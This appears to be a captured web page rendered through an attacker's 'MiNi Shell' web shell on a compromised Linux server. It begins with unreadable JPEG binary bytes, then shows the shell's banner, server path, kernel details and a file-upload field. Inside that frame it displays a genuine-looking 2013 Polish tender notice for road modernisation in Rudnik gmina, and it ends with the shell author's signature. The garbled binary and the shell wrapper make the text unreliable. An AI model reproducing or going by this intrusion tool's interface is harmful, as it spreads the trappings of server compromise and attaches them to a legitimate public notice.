JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20131219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20131219/527740-N-2013.html

<p class="kh_header"><b>Rudnik: Modernizacja dróg gminnych na terenie gminy Rudnik - ZP.271.12.2013</b><br>
<b>Numer ogłoszenia: 527740 - 2013; data zamieszczenia: 19.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Rudnik , ul. Kozielska 1, 47-411 Rudnik, woj. śląskie, tel. 032 4106428, faks 032 4106418 wew. 123.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina-rudnik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja dróg gminnych na terenie gminy Rudnik - ZP.271.12.2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Modernizacja dróg gminnych na terenie gminy Rudnik 
ZADANIE CZĘŚCIOWE NR 1 pn. Modernizacja dróg gminnych w miejscowości  Brzeźnica i Lasaki
dotyczy:
 a) Modernizacji ul. Górnej w miejscowości Brzeźnica na odcinku  od KM 0+935,00 - KM 1+242,50 
Zakres  zamówienia  (etapu I) obejmuje:
-rozebranie istniejącej konstrukcji jezdni o nawierzchni bitumicznej 1 + 066 - 1 +242,5 i z płyt drogowych O + 935,0 - 1 + 066 o nawierzchni z asfaltobetonu,
- wykonanie drogi na odcinku od0+935,00 - KM 1+242,50 ( tj. 0,308 km),
- wykonanie kanalizacji deszczowej od studni K 1 do K 5,
- zabudowa separatora i wykonanie wylotu do Potoku Brzeźnickiego.
- W cenie oferty należy  uwzględnić koszt odszukania kamieni granicznych na odcinku objętym 	przedmiotem zamówienia (tj. I etapu). 
b) Remont ul. Sławikowskiej i Bocznej w Lasakach 
Zakres  zamówienia obejmuje:
-rozebranie konstrukcji jezdni o nawierzchni bitumicznej na odcinku 110m pasem szerokości 1,3 -  8,8 i wykonanie nowej konstrukcji składającej się z podbudowy tłuczniowej gr. 23 cm i nawierzchni z asfaltobetonu o łącznej gr 8 cm,
-wymianę nawierzchni bitumicznej w ciągu ul.Bocznej o dł. 123m i wykonanie  nawierzchni asfaltobetonowej o  łącznej gr. 8 cm, powierzchnia 566m2,
- wykonanie na istniejącej nawierzchni tłuczniowej i brukowej  w ciągu ul. Nadodrzańska nawierzchni asfaltobetonowej gr. 8 cm,

3.3.2	ZADANIE CZĘŚCIOWE NR 2  pn. Modernizacja drogi za kaplicą w Czerwięcicach
dotyczy: 
a) Modernizacji  drogi za kaplicą w Czerwięcicach 
Zakres  zamówienia obejmuje:	
rozebranie nawierzchni bitumicznej gr 4 cm,
oczyszczenie nawierzchni tłuczniowej wraz z usunięciem darniny w osi jezdni i na poboczach,
wykonanie rowków pod krawężniki z rozplantowaniem urobku na poboczu,
ustawienie krawężników na ławie betonowej z oporem o długości  329 m,
ułożenie nawierzchni z kostki betonowej szarej gr. 8 cm o powierzchni 550 m2 ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W zakresie: modernizacji drogi w miejscowości Brzeźnica w km 0 + 791 do 0 +935  na odcinku 144 m, oraz kanalizacji od studni K 5 - K9. (dot.zad. częściowego nr 1)</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.23-7, 45.11.12.00-0, 45.11.11.00-9, 45.23.13.00-9, 45.23.31.00-0, 45.11.12.00-2, 45.23.33.00-2, 45.23.32.80-5, 45.23.32.80-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>SZCZEGÓŁOWE  WARUNKI  DOTYCZĄCE  ZADANIA CZĘŚCIOWEGO NR 1 
a) Zamawiający uzna, za  warunek spełniony, jeżeli Wykonawca wykaże wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest 	krótszy - w tym okresie:
co najmniej  jedną (1) robotę budowlaną w zakresie: budowy, przebudowy lub remoncie drogi, o nawierzchni z mieszanki mineralno - asfaltowej, której wartość wyniosła co najmniej 250.000,00 zł brutto i została wykonana zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończona. 
SZCZEGÓŁOWE  WARUNKI  DOTYCZĄCE  ZADANIA CZĘŚCIOWEGO NR 2 
b) Zamawiający uzna, za warunek spełniony, jeżeli Wykonawca wykaże wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
co najmniej  jedną (1) robotę budowlaną w zakresie: budowy, przebudowy lub remoncie  drogi lub placu z kostki brukowej, której wartość wyniosła co najmniej 80.000,00 zł brutto  i została wykonana zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończona. 
Spełnienie ww. warunku, zamawiający oceni na podstawie złożonych dokumentów o którym mowa w rozdz. VI pkt. 6.1.2.
Wykonawca w miejsce poświadczenia, o których mowa w pkt 5.1.2 lit a,b może przedkładać inne 	dokumenty  potwierdzające należyte wykonanie robót budowlanych i zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>SZCZEGÓŁOWE  WARUNKI  DOTYCZĄCE  ZADANIA CZĘŚCIOWEGO NR 1 i 2
a) dysponowania przy realizacji zamówienia co najmniej jedną osobą, pełniącą funkcję kierownika budowy posiadającą uprawnienia budowlane  w specjalności drogowej lub uprawnienia równoważne do powyższych, a wydane na podstawie wcześniej obowiązujących przepisów prawa uprawniające do kierowania robotami na drogach lokalnych i dojazdowych.  
Spełnienie ww warunku zamawiający oceni na podstawie złożonych dokumentów o którym mowa w rozdz. VI pkt.6.1.3 i 6.1.4.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany Formularz Ofertowy wypełniony według wzoru stanowiącego Załącznik nr 1 do niniejszej specyfikacji,
-Wypełniony i podpisany kosztorys ofertowy na dane zadanie częściowe. W przypadku  złożenia oferty tylko  na zadanie częściowe  nr 1 należy wypełnić 2 kosztorysy  ofertowe, natomiast składając ofertę tylko na zadanie nr 2 należy wypełnić 1 kosztorys ofertowy. W przypadku złożenia oferty na całość należy dołączyć 3 kosztorysy ofertowe.
Kosztorysy ofertowe należy sporządzić metodą kalkulacji uproszczonej,  na podstawie  opracowanego przez Zamawiającego przedmiaru robót zgodnie z zapisami rozdz. XII,
- pełnomocnictwo w przypadku gdy formularz ofertowy lub załączone do niego dokumenty są podpisane przez osobę, której umocowanie do reprezentowania Wykonawcy nie wynika z wpisu do 	właściwego rejestru lub ewidencji działalności gospodarczej lub ofertę składają podmioty wspólnie ubiegające się o udzielenie zamówienia,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany rzutujące na termin wykonania umowy wymagać będą wprowadzenia aneksu do niniejszej umowy  pod warunkiem, że wystąpią opóźnienia wynikające z  takich okoliczności jak:   
a) działania siły wyższej (np. klęski żywiołowe,) mające bezpośredni wpływ na terminowość  wykonywania robót,
b) warunki atmosferyczne  uniemożliwiające prowadzenie robót budowlanych, przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów, w szczególności: niedopuszczalne temperatury powietrza, gwałtowne kilkudniowe opady deszczu lub opady śniegu, zalegający śnieg itp. 
c) możliwa jest zmiana terminu  wykonania umowy ze względu na ewentualne wstrzymanie i wznowienie  robót  ze względu na roboty dodatkowe (zamówienia dodatkowe) 
d) konieczności usunięcia niewypałów i niewybuchów
e) konieczności wykonania wykopalisk archeologicznych,
f) zmiany  przepisów powodujących konieczność uzyskania dokumentów, które te przepisy narzucają,
g) zmiany technologiczne, w szczególności :
- konieczności zastosowania materiałów innych niż były przewidziane w projekcie z uwagi na wycofanie przedmiotowych materiałów z produkcji 
- konieczności zastosowania innych przepisów i norm niż były przewidziane w projekcie z uwagi na zmianę przepisów,norm,
- stwierdzenie odmiennych niż w dokumentacji projektowej warunków w terenie,
- zmian uzasadnionych koniecznością zwiększenia bezpieczeństwa realizacji robót budowlanych lub 	usprawnienie procesu budowy,
- obniżenie kosztu wykonania robót lub kosztu eksploatacji (użytkowania ) obiektu,
- w trakcie realizacji zamówienia zastosowano lepsze materiały budowlane bądź inną technologię wykonania robót.
Sposób obliczenia ceny dla robót zamiennych zgodnie z zapisami umownymi o których mowa w  § 2 ust.4.3.2 lit a -c. 
h) możliwe jest przedłużenie terminu zakończenia umowy o czas opóźnienia, jeżeli opóźnienie to wynika z przyczyn leżących po stronie zamawiającego i jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy, w zakresie następujących obowiązków zamawiającego:
- przekazania placu budowy,
-  W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w lit a - h, termin wykonania umowy może ulec odpowiedniemu przedłużeniu nie dłużej jednak niż o okres trwania tych okoliczności .

Zmiany  mające wpływ na wysokość   wynagrodzenia 
a) rozliczenie kosztorysowe, 
b) wystąpią w trakcie realizacji robót podstawowych, roboty dodatkowe (prace dodatkowe) które nie  zostały ujęte w kosztorysie ofertowym, a były uwzględnione w opisie przedmiotu zamówienia zawartym w SIWZ (tj. dokumentacji projektowej) rozliczone zostaną zgodnie z zapisami  o których mowa w § 2 ust.3 umowy, wyłącznie w sytuacji gdy wykonanie tych robót będzie niezbędne do prawidłowego wykonania przedmiotu umowy. Zamówienia winny być wprowadzone na wniosek Wykonawcy lub  przy udziale przedstawicieli Zamawiającego  zatwierdzających przyjęcie wniosku.   
c) W  przypadku uzasadnionego, uzgodnionego przez strony zmniejszenia zakresu rzeczowego robót	nastąpi zmniejszenie wartości wynagrodzenia umownego o wartość wycenionych, a nie wykonanych prac, wyliczone w oparciu o ceny jednostkowe zastosowane w kosztorysie ofertowym na podstawie obmiaru,
d) zmiana stawki podatku od towarów i usług (VAT)
Pozostałe zmiany 
a)zmiana osób występujących po stronie Zamawiającego  i Wykonawcy, 
Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy  każdorazowo opisać  w stosownych dokumentach (notatka służbowa, pismo Wykonawcy, protokół konieczności, itp.). Protokół konieczności wymaga zatwierdzenia przez Zamawiającego. W rezultacie dokonania czynności opisanych wyżej może dojść do podpisania przez strony aneksu do umowy. Projekt aneksu przygotuje Zamawiający.  	
Warunki nieistotne 
a)inne, które nie będą w sposób istotny ingerować w przedmiot zamówienia, 
b)zmiana będąca skutkiem poprawy oczywistej omyłki.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ww.bip.gmina-rudnik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rudnik ul. Kozielska 1 
47 - 411 Rudnik.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.01.2014 godzina 10:00, miejsce: Urząd Gminy Rudnik ul.Kozielska 1 -sekretariat parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 1 pn. Modernizacja dróg gminnych w miejscowości Brzeźnica i Lasaki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE CZĘŚCIOWE NR 1 pn. Modernizacja dróg gminnych w miejscowości Brzeźnica  i Lasaki.
dotyczy:
a)Modernizacji ul. Górnej w miejscowości Brzeźnica na odcinku  od KM 0+935,00 - KM 1+242,50 
Zakres  zamówienia  (etapu I) obejmuje:
-rozebranie istniejącej konstrukcji jezdni o nawierzchni bitumicznej 1 + 066 - 1 +242,5 i z płyt drogowych O + 935,0 - 1 + 066 o nawierzchni z asfaltobetonu,
-  wykonanie drogi na odcinku od0+935,00 - KM 1+242,50 ( tj. 0,308 km),
- wykonanie kanalizacji deszczowej od studni K 1 do K 5,
- zabudowa separatora i wykonanie wylotu do Potoku Brzeźnickiego.
- W cenie oferty należy  uwzględnić koszt odszukania kamieni granicznych na odcinku objętym 	przedmiotem zamówienia (tj. I etapu). 
b) Remont ul. Sławikowskiej i Bocznej w Lasakach 
Zakres  zamówienia obejmuje:
-rozebranie konstrukcji jezdni o nawierzchni bitumicznej na odcinku 110m pasem szerokości 1,3 -  8,8 i wykonanie nowej konstrukcji składającej się z podbudowy tłuczniowej gr. 23 cm i nawierzchni z asfaltobetonu o łącznej gr 8 cm,
- wymianę nawierzchni bitumicznej w ciągu ul.Bocznej o dł. 123m i wykonanie  nawierzchni asfaltobetonowej o  łącznej gr. 8 cm, powierzchnia 566m2,
- wykonanie na istniejącej nawierzchni tłuczniowej i brukowej  w ciągu ul. Nadodrzańska nawierzchni asfaltobetonowej gr. 8 cm.

Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających  tylko w  zadaniu częściowym nr 1  w zakresie modernizacji drogi gminnej  w miejscowości  Brzeźnica w km 0 + 791 do 0 +935  na odcinku 144 m, oraz kanalizacji od studni K 5 - K9 ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.23-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 2  pn. Modernizacja drogi za kaplicą w Czerwięcicach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Modernizacji  drogi za kaplicą w Czerwięcicach 
Zakres  zamówienia obejmuje:	
rozebranie nawierzchni bitumicznej gr 4 cm,
oczyszczenie nawierzchni tłuczniowej wraz z usunięciem darniny w osi jezdni i na poboczach,
wykonanie rowków pod krawężniki z rozplantowaniem urobku na poboczu,
ustawienie krawężników na ławie betonowej z oporem o długości  329 m,
ułożenie nawierzchni z kostki betonowej szarej gr. 8 cm o powierzchni 550 m2 ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com